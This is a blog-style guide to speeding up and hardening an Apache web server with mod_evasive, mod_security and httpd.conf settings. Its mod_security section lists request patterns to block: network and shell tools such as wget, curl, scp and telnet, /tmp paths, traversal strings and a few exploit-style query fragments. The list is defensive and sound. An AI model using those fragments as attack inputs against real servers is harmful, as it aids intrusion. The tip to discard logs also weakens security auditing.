Apache Performance and Security Guide

This guide is written mostly for web administrators/developers, who want to optimize the speed and increase the security of Apache web server. Without a doubt, Apache is still one of the best web servers on the Internet. Being open source, loaded with modules that can do almost anything, Apache is a good solution for both development and production needs. This guide will help you get the best out of Apache web server by letting you control its usage with minimum resources.

1) Who should use this guide?

Web admins and web developers who want to optimize the speed and increase the security of Apache Web Server. Also the guide is useful for ISPs who get slammed with big loads of traffic.

2) On what operating systems has this guide been tested on?

This guide was tested on Redhat Enterprise Linux 5 and Fedora Core 8, but should work on any *nix or win32 environment as well.

3) Does this guide guarantee a significant increase in performance of Apache?

This guide might or might not help you increase the speed of Apache. I don't guarantee anything. Please be warned that the speed of Apache is controlled by many factors such as amount of RAM, processor speed, size of the executable, number of compiled modules and etc. Don't expect your Apache to be twice as fast just because you followed the guide. I will do my best in providing explanations for what I'm doing and why, so that you understand the purpose of every action and how it can help you in speeding up your web server.

4) What you need to get started:

The guide is useless without a working Apache installation. If you don't have Apache installed yet, go ahead and install it now. You can follow my "Apache, PHP, GD & Mod_Perl Guide" or install it on your own. I do not recommend running the default RPM version of Apache that comes with your OS distribution for various reasons. Go ahead and download the following modules into your source directory (in this case the source directory is /usr/local/src).

List of useful modules:
- mod_evasive 1.10.1 from http://www.zdziarski.com/projects/mod_evasive/
- mod_security 1.9.5 from http://www.modsecurity.org

5) Purpose of mod_evasive

This is the official description from mod_evasive's homepage: mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_dosevasive presently reports abuses via email and syslog facilities. Simply put, mod_evasive allows us to detect web attacks and take necessary steps to ensure that the attacks do not bring the server down. When an attack takes place (let's say a hacker decides to initiate a DoS attack against your webserver by requesting thousands of pages at the same time), this module blocks the hacker's IP address for 10 seconds (default) and issues a 403 error. If within 10 seconds another request comes in from the same user, the counter will be reset to 0 and the attacker will have to wait another 10 seconds before being able to request a page.

5.1) Installing mod_evasive

I will assume that your Apache is installed at /etc/httpd. If it is located somewhere else, please change the paths below as needed.

cd /usr/local/src
tar zxf mod_evasive.1.10.1.tar.gz
cd mod_evasive
/etc/httpd/bin/apxs -iac mod_evasive.c

5.2) Configuring mod_evasive

APXS will automatically install the module and change your httpd.conf as needed. We still have to insert the specific module configuration into the Apache configuration file though. Open up httpd.conf with your favorite editor and copy paste the following at the end of the file:

<IfModule mod_evasive.c>
    DOSHashTableSize 16384
    DOSPageCount 10
    DOSSiteCount 100
    DOSPageInterval 1
    DOSSiteInterval 1
    DOSBlockingPeriod 60
</IfModule>

Those who are curious about what every line means in the above configuration, please read the README file in mod_evasive folder. It explains every single directive and its purpose. It's recommended to increase the DOSHashTableSize to a higher value on busy servers.

6) Purpose of mod_security

mod_security adds intrusion detection and prevention features to the Apache Web Server. It has built-in functions to prevent various types of attacks such as command execution, directory traversal, SQL injection and etc. Overall, mod_security is a very good way to monitor your web services especially in shared hosting environments.

6.1) Installing mod_security

Again, change your Apache path if it's not /etc/httpd.

cd /usr/local/src
tar zxf modsecurity-apache_1.9.5.tar.gz
cd modsecurity-apache_1.9.5/apache1
/etc/httpd/bin/apxs -iac mod_security.c

6.2) Configuring mod_security

The following configuration is what I would use for a webserver. However, you can read the documentation and tweak mod_security to your needs. There are many things you can do with this module. One of the biggest advantages of mod_security is its ability to be configured differently per virtual host. In this case, you can have one general configuration that applies to all hosts and you could also add more directives on an insecure virtualhost, if necessary. Again, copy-paste the following into the end of httpd.conf:

<IfModule mod_security.c>
    SecFilterEngine On
    SecFilterDefaultAction "deny,log,status:403"
    SecFilterScanPOST On
    SecFilterCheckURLEncoding On
    SecFilterCheckCookieFormat On
    SecFilterCheckUnicodeEncoding Off
    SecFilterForceByteRange 1 255
    SecAuditEngine RelevantOnly
    SecAuditLog logs/modsec_audit_log
    SecFilterDebugLevel 0
    SecFilterDebugLog logs/modsec_debug_log
    SecFilter "viewtopic\.php\?" chain
    SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
    SecFilterSelective REQUEST_METHOD "!^GET$" chain
    SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"
    SecFilterSelective REQUEST_METHOD "^POST$" chain
    SecFilterSelective HTTP_Content-Length "^$"
    SecFilterSelective HTTP_Transfer-Encoding "!^$"
    SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
    SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
    SecFilterSelective THE_REQUEST "wget "
    SecFilterSelective THE_REQUEST "lynx "
    SecFilterSelective THE_REQUEST "scp "
    SecFilterSelective THE_REQUEST "ftp "
    SecFilterSelective THE_REQUEST "cvs "
    SecFilterSelective THE_REQUEST "rcp "
    SecFilterSelective THE_REQUEST "curl "
    SecFilterSelective THE_REQUEST "telnet "
    SecFilterSelective THE_REQUEST "ssh "
    SecFilterSelective THE_REQUEST "echo "
    SecFilterSelective THE_REQUEST "links -dump "
    SecFilterSelective THE_REQUEST "links -dump-charset "
    SecFilterSelective THE_REQUEST "links -dump-width "
    SecFilterSelective THE_REQUEST "links http:// "
    SecFilterSelective THE_REQUEST "links ftp:// "
    SecFilterSelective THE_REQUEST "links -source "
    SecFilterSelective THE_REQUEST "mkdir "
    SecFilterSelective THE_REQUEST "cd /tmp "
    SecFilterSelective THE_REQUEST "cd /var/tmp "
    SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
    SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
    SecFilterSelective THE_REQUEST "/../../ "
    SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
    SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
    SecUploadDir /tmp
    SecUploadKeepFiles Off
</IfModule>

Want to find out what each line does? Read mod_security documentation. To test mod_security, The above configuration was tested on a production server.

7) Apache config (httpd.conf) considerations

1. Never turn "HostnameLookups" to "On" in httpd.conf. You do not want to look up every single IP that accesses your web server in your DNS.
2. Do not play with "MinSpareservers, MaxSpareServers and StartServers" configuration options unless you know what you are doing. Leaving the defaults works good for most servers.
3. Those who have busy servers should decrease the value of "KeepAliveTimeout" to 5 (the default is 15). You do not want Apache processes to wait for 15 seconds after a request before they die if the number of server requests is considerably high.
4. Set "AllowOverride" to "None" everywhere possible. ISPs might not like this idea because of their users though. If your client does not modify the .htaccess file often, set the parameters expicitly in apache configuration file instead.
5. Decrease the number of "DirectoryIndex" parameters. I usually set it to "index.html index.php" on my apache configuration. Letting Apache look for all DirectoryIndex files in your web folder is a waste of resources.
6. If you do not need to log each request on your webserver, disable logging. This will save some hard disk space and decrease the number of concurrent write processes on your system. You can either uncomment all mod_log* modules or send log requests to /dev/null. An example of this would be "CustomLog /dev/null" and "ErrorLog /dev/null". For virtual server setups, log only the hosts that need the logs of all requests.
7. Set "ServerTokens" to "Prod" in your httpd.conf. This will hide all of the modules you have compiled into Apache together with Apache's version. If you check your server in Netcraft's "What's That Site Running" it will only show "Apache" instead of the detailed report. For security reasons, you do not want hackers to know what version of Apache and what kind of modules you are running on the server.
8. Put the following lines into your httpd.conf:

   <Filesmatch "\.(inc|tpl|h|ihtml|sql|ini|conf|bin|spd|theme|module)$">
       Deny from all
   </Filesmatch>
   <Files ~ "\config.php$">
       Deny from all
   </Files>

   This will prevent people from downloading configuration files from your server.

8) Other performance considerations

1. Increase the amount of RAM. The more RAM, the better. You should have enough memory for Apache to put requests into RAM instead of your swap on the hard drive. Letting Apache swap and queue requests is not a good idea. If you have a busy site with less than 512 Mb of RAM there is a possibility that Apache will kill your server (your machine will no longer be accessible from outside). So always make sure that you have enough RAM in your web server.
2. If you have large files in your web server (such as large images, mp3 files, movies, etc) do not let Apache serve the files. Install thttpd server and let it handle all your download requests. You should only use Apache to process dynamic content.

9) Other security considerations

By default Apache is a secure server. However, many administrators decrease its security by installing too many modules that they do not need. Some administrators think "the more modules, the better it is because the server will be full of features and compatible with everything". But they do not understand the fact that most of Apache modules are written by third party organizations or individuals that have nothing to do with Apache development. Thus, some modules might be the cause of your segmentation faults and security concerns. Rule of thumb while compiling Apache: the lower the number of modules, the tighter the security. Decreasing the number of modules also means smaller Apache binary file (only if you are compiling modules into Apache instead of running them as dso) which, in turn, results in lower memory consumption per Apache child and your server will be capable of handling more simultaneous requests.

I recommend reading security issues for every module installed into Apache. One of the modules you should be always watching for is mod_php. PHP is notorious for security issues that come out every once in a while. Thanks to the ongoing development and a large PHP community, these issues are addressed almost immediately and a new fixed version gets released to public. Make sure that you are running the latest version of PHP. I have a separate guide on compiling latest versions of Apache with PHP right here. Carefully review php.ini file in your PHP configuration and set everything to maximum security. You should also consider using Apache in unprivileged non-root chroot environment. Even in case your apache gets compromised, the attacker will not be able to damage your system. This is especially vital if you are running a dedicated server that you do not have physical access to.

10) Apache security/performance related links

- Apache security tips
- Apache: The Definitive Guide, 2nd Edition chapter 13 (O'Reilly)
- Apache performance notes



Nasim Mansurov is a professional photographer based out of Denver, Colorado. He is the author and founder of The Mansurovs, along with a number of other online resources. Read more about Nasim here.
Tagged as: Apache, Security
Posted in: Linux-Unix Leave a comment
25 Views
Share and Enjoy:
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 
• 

Related posts:

1. Apache Bandwidth Throttling
2. Apache, PHP, GD & Mod_Perl Guide
3. Apache Guide has been updated
4. Apache Bandwidth Throttling guide has been completed
5. Apache Install Guide Updated